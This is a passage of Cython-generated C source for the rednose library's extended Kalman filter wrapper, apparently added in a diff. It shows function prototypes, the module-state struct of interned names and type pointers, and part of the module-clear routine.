__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx___cinit__(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_gen_dir, PyObject *__pyx_v_name, PyArrayObject *__pyx_v_Q, PyArrayObject *__pyx_v_x_initial, PyArrayObject *__pyx_v_P_initial, int __pyx_v_dim_main, int __pyx_v_dim_main_err, int __pyx_v_N, int __pyx_v_dim_augment, int __pyx_v_dim_augment_err, PyObject *__pyx_v_maha_test_kinds, PyObject *__pyx_v_quaternion_idxs, PyObject *__pyx_v_global_vars, double __pyx_v_max_rewind_age, CYTHON_UNUSED PyObject *__pyx_v_logger); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_2init_state(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, PyArrayObject *__pyx_v_state, PyArrayObject *__pyx_v_covs, PyObject *__pyx_v_filter_time); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_4state(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_6covs(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_8set_filter_time(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, double __pyx_v_t); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_10get_filter_time(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_12set_global(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, PyObject *__pyx_v_global_var, double __pyx_v_val); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_14reset_rewind(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_16predict(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, double __pyx_v_t); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_18predict_and_update_batch(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, double __pyx_v_t, int __pyx_v_kind, PyObject *__pyx_v_z, PyObject *__pyx_v_R, PyObject *__pyx_v_extra_args, bool __pyx_v_augment); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_20augment(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_22get_augment_times(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_24rts_smooth(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_estimates, CYTHON_UNUSED PyObject *__pyx_v_norm_quats); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_26maha_test(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_x, CYTHON_UNUSED PyObject *__pyx_v_P, CYTHON_UNUSED PyObject *__pyx_v_kind, CYTHON_UNUSED PyObject *__pyx_v_z, CYTHON_UNUSED PyObject *__pyx_v_R, CYTHON_UNUSED PyObject *__pyx_v_extra_args, CYTHON_UNUSED PyObject *__pyx_v_maha_thresh); /* proto */ +static void __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_28__dealloc__(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_30__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_32__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_7cpython_4type_type; + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_5numpy_dtype; + PyTypeObject *__pyx_ptype_5numpy_flatiter; + PyTypeObject *__pyx_ptype_5numpy_broadcast; + PyTypeObject *__pyx_ptype_5numpy_ndarray; + PyTypeObject *__pyx_ptype_5numpy_generic; + PyTypeObject *__pyx_ptype_5numpy_number; + PyTypeObject *__pyx_ptype_5numpy_integer; + PyTypeObject *__pyx_ptype_5numpy_signedinteger; + PyTypeObject *__pyx_ptype_5numpy_unsignedinteger; + PyTypeObject *__pyx_ptype_5numpy_inexact; + PyTypeObject *__pyx_ptype_5numpy_floating; + PyTypeObject *__pyx_ptype_5numpy_complexfloating; + PyTypeObject *__pyx_ptype_5numpy_flexible; + PyTypeObject *__pyx_ptype_5numpy_character; + PyTypeObject *__pyx_ptype_5numpy_ufunc; + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx; + PyObject *__pyx_type___pyx_array; + PyObject *__pyx_type___pyx_MemviewEnum; + PyObject *__pyx_type___pyx_memoryview; + PyObject *__pyx_type___pyx_memoryviewslice; + #endif + PyTypeObject *__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx; + PyTypeObject *__pyx_array_type; + PyTypeObject *__pyx_MemviewEnum_type; + PyTypeObject *__pyx_memoryview_type; + PyTypeObject *__pyx_memoryviewslice_type; + PyObject *__pyx_kp_u_; + PyObject *__pyx_n_s_ASCII; + PyObject *__pyx_kp_s_All_dimensions_preceding_dimensi; + PyObject *__pyx_n_s_AssertionError; + PyObject *__pyx_kp_s_Buffer_view_does_not_expose_stri; + PyObject *__pyx_n_u_C; + PyObject *__pyx_kp_s_Can_only_create_a_buffer_that_is; + PyObject *__pyx_kp_s_Cannot_assign_to_read_only_memor; + PyObject *__pyx_kp_s_Cannot_create_writable_memory_vi; + PyObject *__pyx_kp_u_Cannot_index_with_type; + PyObject *__pyx_kp_s_Cannot_transpose_memoryview_with; + PyObject *__pyx_kp_s_Dimension_d_is_not_direct; + PyObject *__pyx_n_s_EKF_sym_pyx; + PyObject *__pyx_n_s_EKF_sym_pyx___reduce_cython; + PyObject *__pyx_n_s_EKF_sym_pyx___setstate_cython; + PyObject *__pyx_n_s_EKF_sym_pyx_augment; + PyObject *__pyx_n_s_EKF_sym_pyx_covs; + PyObject *__pyx_n_s_EKF_sym_pyx_get_augment_times; + PyObject *__pyx_n_s_EKF_sym_pyx_get_filter_time; + PyObject *__pyx_n_s_EKF_sym_pyx_init_state; + PyObject *__pyx_n_s_EKF_sym_pyx_maha_test; + PyObject *__pyx_n_s_EKF_sym_pyx_predict; + PyObject *__pyx_n_s_EKF_sym_pyx_predict_and_update_b; + PyObject *__pyx_n_s_EKF_sym_pyx_reset_rewind; + PyObject *__pyx_n_s_EKF_sym_pyx_rts_smooth; + PyObject *__pyx_n_s_EKF_sym_pyx_set_filter_time; + PyObject *__pyx_n_s_EKF_sym_pyx_set_global; + PyObject *__pyx_n_s_EKF_sym_pyx_state; + PyObject *__pyx_n_s_Ellipsis; + PyObject *__pyx_kp_s_Empty_shape_tuple_for_cython_arr; + PyObject *__pyx_n_s_ImportError; + PyObject *__pyx_kp_s_Incompatible_checksums_0x_x_vs_0; + PyObject *__pyx_n_s_IndexError; + PyObject *__pyx_kp_s_Index_out_of_bounds_axis_d; + PyObject *__pyx_kp_s_Indirect_dimensions_not_supporte; + PyObject *__pyx_kp_u_Invalid_mode_expected_c_or_fortr; + PyObject *__pyx_kp_u_Invalid_shape_in_axis; + PyObject *__pyx_n_s_MemoryError; + PyObject *__pyx_kp_s_MemoryView_of_r_at_0x_x; + PyObject *__pyx_kp_s_MemoryView_of_r_object; + PyObject *__pyx_n_s_N; + PyObject *__pyx_n_s_NotImplementedError; + PyObject *__pyx_n_b_O; + PyObject *__pyx_kp_u_Out_of_bounds_on_buffer_access_a; + PyObject *__pyx_n_s_P; + PyObject *__pyx_n_s_P_initial; + PyObject *__pyx_n_s_PickleError; + PyObject *__pyx_n_s_Q; + PyObject *__pyx_n_s_R; + PyObject *__pyx_n_s_R_map; + PyObject *__pyx_n_s_Ri; + PyObject *__pyx_n_s_Ri_b; + PyObject *__pyx_n_s_Sequence; + PyObject *__pyx_kp_s_Step_may_not_be_zero_axis_d; + PyObject *__pyx_kp_b_T; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_kp_s_Unable_to_convert_item_to_object; + PyObject *__pyx_n_s_ValueError; + PyObject *__pyx_n_s_View_MemoryView; + PyObject *__pyx_kp_b__10; + PyObject *__pyx_kp_b__11; + PyObject *__pyx_kp_b__12; + PyObject *__pyx_kp_u__13; + PyObject *__pyx_kp_u__14; + PyObject *__pyx_kp_u__2; + PyObject *__pyx_n_s__3; + PyObject *__pyx_n_s__58; + PyObject *__pyx_kp_u__6; + PyObject *__pyx_kp_u__7; + PyObject *__pyx_kp_b__9; + PyObject *__pyx_n_s_a; + PyObject *__pyx_n_s_abc; + PyObject *__pyx_n_s_allocate_buffer; + PyObject *__pyx_kp_u_and; + PyObject *__pyx_n_s_args; + PyObject *__pyx_n_s_args_map; + PyObject *__pyx_n_s_asarray; + PyObject *__pyx_n_s_ascontiguousarray; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_augment; + PyObject *__pyx_n_s_base; + PyObject *__pyx_n_s_c; + PyObject *__pyx_n_u_c; + PyObject *__pyx_n_s_class; + PyObject *__pyx_n_s_class_getitem; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_collections; + PyObject *__pyx_kp_s_collections_abc; + PyObject *__pyx_kp_s_contiguous_and_direct; + PyObject *__pyx_kp_s_contiguous_and_indirect; + PyObject *__pyx_n_s_copy; + PyObject *__pyx_n_s_count; + PyObject *__pyx_n_s_covs; + PyObject *__pyx_n_s_covs_b; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_n_s_dim_augment; + PyObject *__pyx_n_s_dim_augment_err; + PyObject *__pyx_n_s_dim_main; + PyObject *__pyx_n_s_dim_main_err; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_n_s_double; + PyObject *__pyx_n_s_dtype; + PyObject *__pyx_n_s_dtype_is_object; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_encode; + PyObject *__pyx_n_s_enumerate; + PyObject *__pyx_n_s_error; + PyObject *__pyx_n_s_estimates; + PyObject *__pyx_n_s_extra_args; + PyObject *__pyx_n_s_extra_args_map; + PyObject *__pyx_n_s_filter_time; + PyObject *__pyx_n_s_flags; + PyObject *__pyx_n_s_format; + PyObject *__pyx_n_s_fortran; + PyObject *__pyx_n_u_fortran; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_gen_dir; + PyObject *__pyx_n_s_get_augment_times; + PyObject *__pyx_n_s_get_filter_time; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_s_global_var; + PyObject *__pyx_n_s_global_vars; + PyObject *__pyx_kp_u_got; + PyObject *__pyx_kp_u_got_differing_extents_in_dimensi; + PyObject *__pyx_n_s_id; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_index; + PyObject *__pyx_n_s_init_state; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_itemsize; + PyObject *__pyx_kp_s_itemsize_0_for_cython_array; + PyObject *__pyx_n_s_join; + PyObject *__pyx_n_s_kind; + PyObject *__pyx_n_s_logger; + PyObject *__pyx_n_s_maha_test; + PyObject *__pyx_n_s_maha_test_kinds; + PyObject *__pyx_n_s_maha_thresh; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_max_rewind_age; + PyObject *__pyx_n_s_memview; + PyObject *__pyx_n_s_mode; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_name_2; + PyObject *__pyx_n_s_nan; + PyObject *__pyx_n_s_ndim; + PyObject *__pyx_n_s_new; + PyObject *__pyx_kp_s_no_default___reduce___due_to_non; + PyObject *__pyx_n_s_norm_quats; + PyObject *__pyx_n_s_np; + PyObject *__pyx_n_s_numpy; + PyObject *__pyx_kp_u_numpy_core_multiarray_failed_to; + PyObject *__pyx_kp_u_numpy_core_umath_failed_to_impor; + PyObject *__pyx_n_s_obj; + PyObject *__pyx_n_s_order; + PyObject *__pyx_n_s_pack; + PyObject *__pyx_n_s_pickle; + PyObject *__pyx_n_s_predict; + PyObject *__pyx_n_s_predict_and_update_batch; + PyObject *__pyx_n_s_pyx_PickleError; + PyObject *__pyx_n_s_pyx_checksum; + PyObject *__pyx_n_s_pyx_result; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_type; + PyObject *__pyx_n_s_pyx_unpickle_Enum; + PyObject *__pyx_n_s_pyx_vtable; + PyObject *__pyx_n_s_quaternion_idxs; + PyObject *__pyx_n_s_range; + PyObject *__pyx_n_s_rednose_helpers_ekf_sym_pyx; + PyObject *__pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_register; + PyObject *__pyx_n_s_res; + PyObject *__pyx_n_s_reset_rewind; + PyObject *__pyx_n_s_rts_smooth; + PyObject *__pyx_n_s_self; + PyObject *__pyx_n_s_set_filter_time; + PyObject *__pyx_n_s_set_global; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_shape; + PyObject *__pyx_n_s_size; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_n_s_start; + PyObject *__pyx_n_s_state; + PyObject *__pyx_n_s_state_b; + PyObject *__pyx_n_s_step; + PyObject *__pyx_n_s_stop; + PyObject *__pyx_kp_s_strided_and_direct; + PyObject *__pyx_kp_s_strided_and_direct_or_indirect; + PyObject *__pyx_kp_s_strided_and_indirect; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_struct; + PyObject *__pyx_n_s_sys; + PyObject *__pyx_n_s_t; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_tmpvec; + PyObject *__pyx_kp_s_unable_to_allocate_array_data; + PyObject *__pyx_kp_s_unable_to_allocate_shape_and_str; + PyObject *__pyx_n_s_unpack; + PyObject *__pyx_n_s_update; + PyObject *__pyx_n_u_utf8; + PyObject *__pyx_n_s_val; + PyObject *__pyx_n_s_version_info; + PyObject *__pyx_n_s_x; + PyObject *__pyx_n_s_x_initial; + PyObject *__pyx_n_s_z; + PyObject *__pyx_n_s_z_map; + PyObject *__pyx_n_s_zi; + PyObject *__pyx_n_s_zi_b; + PyObject *__pyx_float_0_95; + PyObject *__pyx_int_0; + PyObject *__pyx_int_1; + PyObject *__pyx_int_3; + PyObject *__pyx_int_112105877; + PyObject *__pyx_int_136983863; + PyObject *__pyx_int_184977713; + PyObject *__pyx_int_neg_1; + PyObject *__pyx_k__17; + PyObject *__pyx_k__18; + PyObject *__pyx_k__19; + PyObject *__pyx_k__28; + PyObject *__pyx_k__33; + PyObject *__pyx_slice__5; + PyObject *__pyx_tuple__4; + PyObject *__pyx_tuple__8; + PyObject *__pyx_tuple__15; + PyObject *__pyx_tuple__16; + PyObject *__pyx_tuple__37; + PyObject *__pyx_tuple__38; + PyObject *__pyx_tuple__39; + PyObject *__pyx_tuple__40; + PyObject *__pyx_tuple__41; + PyObject *__pyx_tuple__42; + PyObject *__pyx_tuple__43; + PyObject *__pyx_tuple__44; + PyObject *__pyx_tuple__45; + PyObject *__pyx_tuple__46; + PyObject *__pyx_tuple__48; + PyObject *__pyx_tuple__49; + PyObject *__pyx_tuple__50; + PyObject *__pyx_tuple__51; + PyObject *__pyx_tuple__52; + PyObject *__pyx_tuple__53; + PyObject *__pyx_tuple__54; + PyObject *__pyx_tuple__55; + PyObject *__pyx_tuple__56; + PyObject *__pyx_tuple__57; + PyObject *__pyx_codeobj__20; + PyObject *__pyx_codeobj__21; + PyObject *__pyx_codeobj__22; + PyObject *__pyx_codeobj__23; + PyObject *__pyx_codeobj__24; + PyObject *__pyx_codeobj__25; + PyObject *__pyx_codeobj__26; + PyObject *__pyx_codeobj__27; + PyObject *__pyx_codeobj__29; + PyObject *__pyx_codeobj__30; + PyObject *__pyx_codeobj__31; + PyObject *__pyx_codeobj__32; + PyObject *__pyx_codeobj__34; + PyObject *__pyx_codeobj__35; + PyObject *__pyx_codeobj__36; + PyObject *__pyx_codeobj__47; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_7cpython_4type_type); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_dtype); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flatiter); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_broadcast); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ndarray); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_generic); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_number); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_integer); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_signedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_unsignedinteger); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_inexact); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_floating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_complexfloating); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_flexible); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_character); + Py_CLEAR(clear_module_state->__pyx_ptype_5numpy_ufunc); + Py_CLEAR(clear_module_state->__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + Py_CLEAR(clear_module_state->__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx); + Py_CLEAR(clear_module_state->__pyx_array_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_array); + Py_CLEAR(clear_module_state->__pyx_MemviewEnum_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_MemviewEnum); + Py_CLEAR(clear_module_state->__pyx_memoryview_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryview); + Py_CLEAR(clear_module_state->__pyx_memoryviewslice_type); + Py_CLEAR(clear_module_state->__pyx_type___pyx_memoryviewslice); + Py_CLEAR(clear_module_state->__pyx_kp_u_); + Py_CLEAR(clear_module_state->__pyx_n_s_ASCII); + Py_CLEAR(clear_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_CLEAR(clear_module_state->__pyx_n_s_AssertionError); + Py_CLEAR(clear_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_CLEAR(clear_module_state->__pyx_n_u_C); + Py_CLEAR(clear_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_CLEAR(clear_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_CLEAR(clear_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_CLEAR(clear_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_augment); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_covs); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_get_augment_times); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_get_filter_time); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_init_state); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_maha_test); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_predict); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_predict_and_update_b); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_reset_rewind); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_rts_smooth); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_set_filter_time); + Py_CLEAR(clear_module_state->__pyx_n_s_EKF_sym_pyx_set_global); + 